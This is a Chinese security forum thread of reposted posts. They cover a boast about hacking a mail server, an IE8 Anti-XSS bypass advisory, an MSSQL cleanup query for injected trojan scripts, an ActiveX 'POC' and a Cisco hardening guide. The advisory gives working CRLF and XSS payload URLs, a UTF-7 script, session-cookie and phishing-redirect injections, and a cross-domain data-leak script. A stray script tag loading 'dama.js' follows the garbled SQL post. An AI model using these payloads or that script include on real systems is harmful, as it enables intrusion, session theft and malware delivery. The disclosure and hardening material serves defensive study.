最近看过此主题的会员

返回列表 发帖

dbank网盘

1

评分人数

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:漂流发表,本帖发表者漂流符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者漂流和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。
收藏 分享

提示: 作者被禁止或删除 内容自动屏蔽

TOP

回复 2# vini5


    哦,下次注意···

TOP

哈哈 支持啊 可以换头像咯哦,不过现在也蛮不错的。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

[原创]看菜鸟如何黑TX邮件服务器
做个动画娱乐下不过也是相当危险的漏洞哦!TX邮箱的漏洞,不说了操作!欢迎访问联盟论坛www.slenk.net非安全中国网欢迎您的访问!www.sitedir.com.cn我们接受安全检测如果你是高手请在测试出漏洞后告诉我们!好了开始看TX的漏洞在邮箱里哦hack by vini5 this just so funny  why this will be show the mail files we can see from the IEso   funny  that is  I am really hacked the TX mail?Oh my  God!※hack by vini5 ######################################################################### # website          : http://www.sitedir.com.cn/#            hack by vini5#  # #########################################################################看见了没有就这么简单写入文件!好了不说了慢慢研究下看看!下载地址http://www.slenk.net/attachment.php?aid=1360
本站下载: http://www.sitedir.com.cn/video/TXmail.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

哈哈,站长论坛的贴子不错,是我们这些读书人来的地方,嘿嘿


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

IE8.0 Beta 2 Anti-XSS问题
Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities
Release Date:December 11, 2008
Date Reported:October 5, 2008
Severity:Medium-High (Execute scripts, Turning Protection Off, Transfer data CrossDomains)
Vendor:Microsoft
Systems Affected:Windows Platform with Internet Explorer 8.0 Beta 2
Overview:Aspect9 has discovered several vulnerabilities in Microsoft WindowsInternet Explorer 8.0 Beta 2. This new version of Microsoft's famousbrowser includes new security improvements such as a Cross Site Scripting(XSS) filter. This version also includes a new object that safely allowstransferring  data across domains, allowing them to interact with each other.
The Anti-XSS filter has been found to have some security holes in thecurrent implementation. Microsoft decided to filter "Type 1 XSS" which isfree  text send to the server being reflected to the user and thereforeinjecting HTML code into the website's page. They chose not to handlecertain situations such as injection into a JavaScript tag space, whichwould be extremely difficult to filter. The software giant also chose notto filter injection into HTTP headers, which will drive hackers to focus ondiscovering CRLF vulnerabilities.
A quote of Microsoft's Anti-XSS filter design philosophy:<<<"Like all security mitigation and protection technologies, the XSS Filter'sapproach does have limitations, being that it is a pragmatic balancebetween application compatibility, security, and performance.
Some examples:* Injection into some contexts is not blocked. Ex: Scenarios where contentcan be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked.Ex: "Referer" based injection.
* If a page contains multiple nearby injection points, attacks can beconstructed that thwart the XSS Filter.">>>
For more information about the Anti-XSS filter:http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx
In order to understand the contents of this advisory, the reader must befamiliar with the concept of CRLF which is distinguished from CRSF.http://www.owasp.org/index.php/CRLF_Injectionhttp://www.owasp.org/index.php/CSRF
Technical Details:
Bypass using CRLF+Encodings:---------------------------------------------Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by thefilter, though the data in the query string will still be filtered.This means that if an attacker tries to exploit a CRLF for XSS in thecasual manner, used in this demo:http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body><script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite thepage charset and therefore bypass the XSS filter which uses the priorencoding. A good example for this is with utf-7, the following request:http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>
This will result in:
HTTP/1.1 200 OKContent-Type: text/html; charset=utf-7Server: Microsoft-IIS/6.0Set-Cookie: url=cooki1=value1;X-Powered-By: PleskWinMicrosoftOfficeWebServer: 5.0_PubX-Powered-By: ASP.NETDate: Sun, 05 Oct 2008 23:46:11 GMTConnection: close
<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>;Content-Type: text/html
This will be rendered as utf-7 and will execute.
Bypass using CRLF+"X-XSS-Protection":-------------------------------------------------------In addition to the problem of CRLF being able to re-write the page andbypass the filter using a different encoding than the one of the page,Microsoft were kind enough to leave a backdoor AKA feature for developersto turn the filter off. This header is called "X-XSS-Protection" which getsa Boolean value of 0 or 1. Injecting "X-XSS-Protection: 0" though CRLF anattacker can shutdown the XSS protection for the current request.
Demo:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('owned')</script></body></html>
Of course the problem goes further to any HTTP header that can be usedmaliciously like setting cookies and by that changing to a different userthen the one logged on, such as stealing their cookie and then replacing itwith a cookie of a bulk user and therefore taking over their session. using"Location:" header to redirect pages and internal frames/iframes tolook-a-like phishing websites and etc...
Demos:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aLocation:http://www.micros0ft.com%0d%0a%0d%0a
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%0a<html><body>The server is busy, try again in 30 minutes</body></html>
CRLF+"XDomainRequestAllowed" --> XDomainRequest Enabling:---------------------------------------------------------Having a CRLF injection already gives an attacker the ability to overwritethe HTTP response BODY, which means he can create a new hiddenimage/frame/form and send data through it, data such as the domains cookie.But it is clear that overwriting the body using CRLF and making it look thesame requires a "fetcher" server side script on the same domain. Also anetwork  filter or a WAF may deny injection of double CRLF (%0d%0a%0d%0a).As time goes by and security evolves, the attacker should have a hardertime sending this information out silently.
In IE8, there is a new object called "XDomainRequest" which is designed toallow safe data exchange across domains.More information at:http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx
The browser will only allow the client(the JavaScript code) to interactwith that website if the website returns the "XDomainRequestAllowed"Boolean header.
Using CRLF to inject XDomainRequestAllowed header an attacker can interactin a CROSS DOMAIN mode with that website without his consent, as it isbeing faked by the injected header. This attack concept on the XDomainRequestin general should be named "XAI" (XDR Allowed Injection)
This is a demo request to a CRLF vulnerable web page:http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1
This is how the attacker's script would look like:------------------------------------------------ <script> try {      xdr = new XDomainRequest();      xdr.onload = function() {        alert(xdr.responseText);      }      xdr.open("GET", "http://www.sitedir.com.cn/crlf.py?url=cooki1%      3dvalue1;%0d%0      aXDomainRequestAllowed: 1");      xdr.send(""); } catch (e) {    alert(e.description) } </script>------------------------------------------------The attacker can now transfer data to/from that domain other domains with just 1header injection, a new, by design weapon to replace leak data with XSS.An attacker can use the new feature to interact with web servers (i.e. send andreceive data from those domains) by pretending to have theauthorization to do so,using a single CRLF header injection.This is an ultimate vulnerability that exploits this new feature to enable easyinformation data leakage and cross domain attacks.
UTF-7 Websites are not filtered:-------------------------------------------When the page charset is set to utf-7 whether by the http header or by ameta tag, the Anti-XSS filter will not apply on this page, allowing a utf-7encoded injected html code to execute. In other words, utf-7 content sentto utf-7 encoded web pages is not filtered, therefore allowing XSS attackson utf-7 web pages.
I must admit that I have never met a website written in utf-7 for non-maliciouspurposes, but it is still a feature and there are many website thatimplement language templates and receive the charset as a parameter fromthe query string or the cookie.
Demos:http://www.sitedir.com.cn/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
http://www.sitedir.com.cn/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
Direct bypass using any double injection:-----------------------------------------A quote from the filter's architecture implementation:<<<"If a page contains multiple nearby injection points, attacks can beconstructed that thwart the XSS Filter.">>>Well, that is not accurate.
ANY second appearance of the injected data will allow execution of scriptcode. The concept is that data inside tags such as script and style isparsed by their own parser.
The CSS(style) parser has 2 characteristics that differentiate it from thescript parser:1) It is a silent parser (there is no indication of failure)2) It is executing as batch operations per block, which means that closingA NON EXISTING (never opened) block will cause parsing of the followingblocks. What does this mean?!?!
It means that in a quite common scenario of any text injected just twice atany position inside the HTML(except inside a textarea/script/style tags,these can also be fixed by putting </textarea> in a css comment) of thepage will cause at the first point where the code is injected to the page
} BODY{a:expression(alert('hi'))};</style>***<style>***
a style tag is opened and anything after it will be ignored by a silent cssparser error and on the second injection:
***} BODY{a:expression(alert('hi'))};</style>***<style>
a new style block will be opened, rendered and this would automaticallyexecute script code!
Demo:http://www.sitedir.com.cn/doublexss.py?username=} BODY{a:expression(alert('hi'))};</style><style>
Filter False Positives:-----------------------The following text send to a page as parameters will trigger a false-positivematch by the Anti-XSS filter:
<"script">alert('innocent code')</script><'script'>alert('innocent code')</script>"<[whatever]script>alert('innocent code')</script>
The following should trigger on most CSS design forums with a previewfeature:<style>@import</style><style>x:y(1)</style>
This means that a CSS tutorial web page cannot send to itself or to anotherpage the following raw text (whether it will be treated as text or as HTMLby the receiving page):
<style>color:rgb(1,2,3)</style>
Vendor Status:Microsoft's response regarding the CRLF issues:"We will not be lead to compromise the XSS Filter's web site compatibilityby attempting to  address every conceivable XSS attack scenario."
Microsoft's response regarding the STYLE issue:"We hope we can get a change in prior to IE8 RC1"
Microsoft's response regarding the "filter not applied in UTF-7 Websites":"Behaviour is by design"
Credit:Rafel Ivgi
Greetings:David Ross, the_pull, Arkon, JonD, lorgandon, xbxice, Budo, Reiter,Inga, Lucid, h.p.c, Dror Shalev,  Liu Die Yu, wir3less, Zull, 0fir0,dbrod, ax1les,whitehawkofjustice
DisclaimerThe information within this paper may change without notice.Use of this information constitutes acceptance for use in anAS IS condition. There are no warranties, implied or express,with regard to this information. In no event shall the authorbe liable for any direct or indirect damages whatsoeverarising out of or in connection with the use or spread ofthis information. Any use of this information is at theuser's own risk.


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MSSQL数据库清除安全辅助工具sql语句
MSSQL数据库被插入木马批量删除sql语句,一朋友服务器被批量插入了js木马,几乎每个表的文本字段都被插入了,网上找了这个sql语句,修改了下,备用。 --删除处理 DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name)     +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://www.hacker.com.cn/cn.js></script>'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id     AND OBJECTPROPERTY(o.id,N'IsUserTable')=1     AND c.xusertype=t.xusertype     AND t.name IN('varchar','nvarchar','char','nchar','text') EXEC sp_MSforeach_Worker @command1=N'?'<script src=http://www.sitedir.com.cn/dama.js></script>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Xunlei ActiveX Remote Exec 0day POC
# Exploit Title: Xunlei Aplayer ActiveX Remote Exec 0day POC# Date: 2010.01.17# Author: superli# Software Link: http://down.sandai.net/Thunder5.9.14.1246.exe# Version: 5.9.14.1246# Tested on: xpsp3 ie6# Code : <object id=TestObj classid="CLSID:{A9322148-C691-4B9D-91FC-B9C461DBE9DD}" style="width:100;height:350"></object>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Cisco路由器的安全配置简易方案
一,路由器访问控制的安全配置1,严格控制可以访问路由器的管理员。任何一次维护都需要记录备案。2,建议不要远程访问路由器。即使需要远程访问路由器,建议使用访问控制列表和高强度的密码控制。3,严格控制CON端口的访问。具体的措施有:A,如果可以开机箱的,则可以切断与CON口互联的物理线路。B,可以改变默认的连接属性,例如修改波特率(默认是96000,可以改为其他的)。C,配合使用访问控制列表控制对CON口的访问。如:Router(Config)#Access-list 1 permit 192.168.0.1    Router(Config)#line con 0    Router(Config-line)#Transport input none    Router(Config-line)#Login local    Router(Config-line)#Exec-timeoute 5 0    Router(Config-line)#access-class 1 in    Router(Config-line)#endD,给CON口设置高强度的密码。4,如果不使用AUX端口,则禁止这个端口。默认是未被启用。禁止如:  Router(Config)#line aux 0  Router(Config-line)#transport input none  Router(Config-line)#no exec5,建议采用权限分级策略。如:Router(Config)#username BluShin privilege 10 G00dPa55w0rdRouter(Config)#privilege EXEC level 10 telnetRouter(Config)#privilege EXEC level 10 show ip access-list6,为特权模式的进入设置强壮的密码。不要采用enable password设置密码。而要采用enable secret命令设置。并且要启用Service password-encryption。7,控制对VTY的访问。如果不需要远程访问则禁止它。如果需要则一定要设置强壮的密码。由于VTY在网络的传输过程中为加密,所以需要对其进行严格的控制。如:设置强壮的密码;控制连接的并发数目;采用访问列表严格控制访问的地址;可以采用AAA设置用户的访问控制等。8,IOS的升级和备份,以及配置文件的备份建议使用FTP代替TFTP。如:Router(Config)#ip ftp username BluShinRouter(Config)#ip ftp password 4tppa55w0rdRouter#copy startup-config ftp:9,及时的升级和修补IOS软件。二,路由器网络服务安全配置1,禁止CDP(Cisco Discovery Protocol)。如:  Router(Config)#no cdp run   Router(Config-if)# no cdp enable2,禁止其他的TCP、UDP Small服务。  Router(Config)# no service tcp-small-servers  Router(Config)# no service udp-samll-servers3,禁止Finger服务。  Router(Config)# no ip finger  Router(Config)# no service finger4,建议禁止HTTP服务。  Router(Config)# no ip http server 如果启用了HTTP服务则需要对其进行安全配置:设置用户名和密码;采用访问列表进行控制。如:Router(Config)# username BluShin privilege 10 G00dPa55w0rd Router(Config)# ip http auth local Router(Config)# no access-list 10Router(Config)# access-list 10 permit 192.168.0.1 Router(Config)# access-list 10 deny any Router(Config)# ip http access-class 10 Router(Config)# ip http serverRouter(Config)# exit 5,禁止BOOTp服务。  Router(Config)# no ip bootp server禁止从网络启动和自动从网络下载初始配置文件。  Router(Config)# no boot network  Router(Config)# no servic config6,禁止IP Source Routing。  Router(Config)# no ip source-route7,建议如果不需要ARP-Proxy服务则禁止它,路由器默认识开启的。  Router(Config)# no ip proxy-arp  Router(Config-if)# no ip proxy-arp8,明确的禁止IP Directed Broadcast。  Router(Config)# no ip directed-broadcast9,禁止IP Classless。  Router(Config)# no ip classless10,禁止ICMP协议的IP Unreachables,Redirects,Mask Replies。  Router(Config-if)# no ip unreacheables  Router(Config-if)# no ip redirects  Router(Config-if)# no ip mask-reply11,建议禁止SNMP协议服务。在禁止时必须删除一些SNMP服务的默认配置。或者需要访问列表来过滤。如:  Router(Config)# no snmp-server community public Ro  Router(Config)# no snmp-server community admin RW  Router(Config)# no access-list 70  Router(Config)# access-list 70 deny any  Router(Config)# snmp-server community MoreHardPublic Ro 70  Router(Config)# no snmp-server enable traps  Router(Config)# no snmp-server system-shutdown  Router(Config)# no snmp-server trap-anth  Router(Config)# no snmp-server  Router(Config)# end12,如果没必要则禁止WINS和DNS服务。  Router(Config)# no ip domain-lookup  如果需要则需要配置:  Router(Config)# hostname Router  Router(Config)# ip name-server 202.102.134.9613,明确禁止不使用的端口。  Router(Config)# interface eth0/3  Router(Config)# shutdown三,路由器路由协议安全配置1,首先禁止默认启用的ARP-Proxy,它容易引起路由表的混乱。Router(Config)# no ip proxy-arp 或者Router(Config-if)# no ip proxy-arp2,启用OSPF路由协议的认证。默认的OSPF认证密码是明文传输的,建议启用MD5认证。并设置一定强度密钥(key,相对的路由器必须有相同的Key)。  Router(Config)# router ospf 100Router(Config-router)# network 192.168.100.0 0.0.0.255 area 100! 启用MD5认证。! area area-id authentication 启用认证,是明文密码认证。!area area-id authentication message-digestRouter(Config-router)# area 100 authentication message-digestRouter(Config)# exitRouter(Config)# interface eth0/1!启用MD5密钥Key为routerospfkey。!ip ospf authentication-key key 启用认证密钥,但会是明文传输。!ip ospf message-digest-key key-id(1-255) md5 keyRouter(Config-if)# ip ospf message-digest-key 1 md5 routerospfkey3,RIP协议的认证。只有RIP-V2支持,RIP-1不支持。建议启用RIP-V2。并且采用MD5认证。普通认证同样是明文传输的。Router(Config)# config terminal! 启用设置密钥链Router(Config)# key chain mykeychainnameRouter(Config-keychain)# key 1!设置密钥字串Router(Config-leychain-key)# key-string MyFirstKeyStringRouter(Config-keyschain)# key 2Router(Config-keychain-key)# key-string MySecondKeyString!启用RIP-V2Router(Config)# router ripRouter(Config-router)# version 2Router(Config-router)# network 192.168.100.0Router(Config)# interface eth0/1! 采用MD5模式认证,并选择已配置的密钥链Router(Config-if)# ip rip authentication mode md5Router(Config-if)# ip rip anthentication key-chain mykeychainname4,启用passive-interface命令可以禁用一些不需要接收和转发路由信息的端口。建议对于不需要路由的端口,启用passive-interface。但是,在RIP协议是只是禁止转发路由信息,并没有禁止接收。在OSPF协议中是禁止转发和接收路由信息。! Rip中,禁止端口0/3转发路由信息Router(Config)# router RipRouter(Config-router)# passive-interface eth0/3 !OSPF中,禁止端口0/3接收和转发路由信息Router(Config)# router ospf 100Router(Config-router)# passive-interface eth0/35,启用访问列表过滤一些垃圾和恶意路由信息,控制网络的垃圾信息流。Router(Config)# access-list 10 deny 192.168.1.0 0.0.0.255Router(Config)# access-list 10 permit any ! 禁止路由器接收更新192.168.1.0网络的路由信息Router(Config)# router ospf 100Router(Config-router)# distribute-list 10 in!禁止路由器转发传播192.168.1.0网络的路由信息Router(Config)# router ospf 100Router(Config-router)# distribute-list 10 out6,建议启用IP Unicast Reverse-Path Verification。它能够检查源IP地址的准确性,从而可以防止一定的IP Spooling。但是它只能在启用CEF(Cisco Express Forwarding)的路由器上使用。Router# config t! 启用CEFRouter(Config)# ip cef!启用Unicast Reverse-Path VerificationRouter(Config)# interface eth0/1Router(Config)# ip verify unicast reverse-path 四,路由器审核安全配置五,路由器其他安全配置1,及时的升级IOS软件,并且要迅速的为IOS安装补丁。2,要严格认真的为IOS作安全备份。3,要为路由器的配置文件作安全备份。4,购买UPS设备,或者至少要有冗余电源。5,要有完备的路由器的安全访问和维护记录日志。6,要严格设置登录Banner。必须包含非授权用户禁止登录的字样。7,IP欺骗得简单防护。如过滤非公有地址访问内部网络。过滤自己内部网络地址;回环地址(127.0.0.0/8);RFC1918私有地址;DHCP自定义地址(169.254.0.0/16);科学文档作者测试用地址(192.0.2.0/24);不用的组播地址(224.0.0.0/4);SUN公司的古老的测试地址(20.20.20.0/24;204.152.64.0/23);全网络地址(0.0.0.0/8)。Router(Config)# access-list 100 deny ip 192.168.0.0 0.0.0.255 any logRouter(Config)# access-list 100 deny ip 127.0.0.0 0.255.255.255 any log Router(Config)# access-list 100 deny ip 192.168.0.0 0.0.255.255 any logRouter(Config)# access-list 100 deny ip 172.16.0.0 0.15.255.255 any logRouter(Config)# access-list 100 deny ip 10.0.0.0 0.255.255.255 any logRouter(Config)# access-list 100 deny ip 169.254.0.0 0.0.255.255 any logRouter(Config)# access-list 100 deny ip 192.0.2.0 0.0.0.255 any logRouter(Config)# access-list 100 deny ip 224.0.0.0 15.255.255.255 any Router(Config)# access-list 100 deny ip 20.20.20.0 0.0.0.255 any logRouter(Config)# access-list 100 deny ip 204.152.64.0 0.0.2.255 any logRouter(Config)# access-list 100 deny ip 0.0.0.0 0.255.255.255 any log8,建议采用访问列表控制流出内部网络的地址必须是属于内部网络的。如:Router(Config)# no access-list 101Router(Config)# access-list 101 permit ip 192.168.0.0 0.0.0.255 anyRouter(Config)# access-list 101 deny ip any any logRouter(Config)# interface eth 0/1Router(Config-if)# description “internet Ethernet”Router(Config-if)# ip address 192.168.0.254 255.255.255.0Router(Config-if)# ip access-group 101 in9,TCP SYN的防范。如:A: 通过访问列表防范。Router(Config)# no access-list 106 Router(Config)# access-list 106 permit tcp any 192.168.0.0 0.0.0.255 establishedRouter(Config)# access-list 106 deny ip any any logRouter(Config)# interface eth 0/2Router(Config-if)# description “external Ethernet”Router(Config-if)# ip address 192.168.1.254 255.255.255.0Router(Config-if)# ip access-group 106 inB:通过TCP截获防范。(这会给路由器产生一定负载)Router(Config)# ip tcp intercept list 107Router(Config)# access-list 107 permit tcp any 192.168.0.0 0.0.0.255Router(Config)# access-list 107 deny ip any any logRouter(Config)# interface eth0Router(Config)# ip access-group 107 in10,LAND.C 进攻的防范。Router(Config)# access-list 107 deny ip host 192.168.1.254 host 192.168.1.254 logRouter(Config)# access-list permit ip any anyRouter(Config)# interface eth 0/2Router(Config-if)# ip address 192.168.1.254 255.255.255.0Router(Config-if)# ip access-group 107 in11,Smurf进攻的防范。Router(Config)# access-list 108 deny ip any host 192.168.1.255 logRouter(Config)# access-list 108 deny ip any host 192.168.1.0 log12,ICMP协议的安全配置。对于进入ICMP流,我们要禁止ICMP协议的ECHO、Redirect、Mask request。也需要禁止TraceRoute命令的探测。对于流出的ICMP流,我们可以允许ECHO、Parameter Problem、Packet too big。还有TraceRoute命令的使用。! outbound ICMP ControlRouter(Config)# access-list 110 deny icmp any any echo logRouter(Config)# access-list 110 deny icmp any any redirect logRouter(Config)# access-list 110 deny icmp any any mask-request logRouter(Config)# access-list 110 permit icmp any any ! Inbound ICMP ControlRouter(Config)# access-list 111 permit icmp any any echoRouter(Config)# access-list 111 permit icmp any any Parameter-problemRouter(Config)# access-list 111 permit icmp any any packet-too-bigRouter(Config)# access-list 111 permit icmp any any source-quenchRouter(Config)# access-list 111 deny icmp any any log! Outbound TraceRoute ControlRouter(Config)# access-list 112 deny udp any any range 33400 34400 ! Inbound TraceRoute ControlRouter(Config)# access-list 112 permit udp any any range 33400 34400 13,DDoS(Distributed Denial of Service)的防范。! The TRINOO DDoS systemRouter(Config)# access-list 113 deny tcp any any eq 27665 logRouter(Config)# access-list 113 deny udp any any eq 31335 logRouter(Config)# access-list 113 deny udp any any eq 27444 log! The Stacheldtraht DDoS system Router(Config)# access-list 113 deny tcp any any eq 16660 logRouter(Config)# access-list 113 deny tcp any any eq 65000 log! The TrinityV3 SystemRouter(Config)# access-list 113 deny tcp any any eq 33270 logRouter(Config)# access-list 113 deny tcp any any eq 39168 log! The SubSeven DDoS system and some VariantsRouter(Config)# access-list 113 deny tcp any any range 6711 6712 logRouter(Config)# access-list 113 deny tcp any any eq 6776 logRouter(Config)# access-list 113 deny tcp any any eq 6669 logRouter(Config)# access-list 113 deny tcp any any eq 2222 logRouter(Config)# access-list 113 deny tcp any any eq 7000 log13,建议启用SSH,废弃掉Telnet。但只有支持并带有IPSec特征集的IOS才支持SSH。并且IOS12.0-IOS12.2仅支持SSH-V1。如下配置SSH服务的例子:Router(Config)# config tRouter(Config)# no access-list 22Router(Config)# access-list 22 permit 192.168.0.22Router(Config)# access-list deny anyRouter(Config)# username BluShin privilege 10 G00dPa55w0rd! 设置SSH的超时间隔和尝试登录次数Router(Config)# ip ssh timeout 90Router(Config)# ip ssh anthentication-retries 2Router(Config)# line vty 0 4Router(Config-line)# access-class 22 inRouter(Config-line)# transport input sshRouter(Config-line)# login localRouter(Config-line)# exit!启用SSH服务,生成RSA密钥对。Router(Config)# crypto key generate rsaThe name for the keys will be: router.blushin.orgChoose the size of the key modulus in the range of 360 to 2048 for your General Purpose Keys .Choosing a key modulus greater than 512 may take a few minutes. How many bits in the modulus[512]: 2048 Generating RSA Keys... [OK] Router(Config)#


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表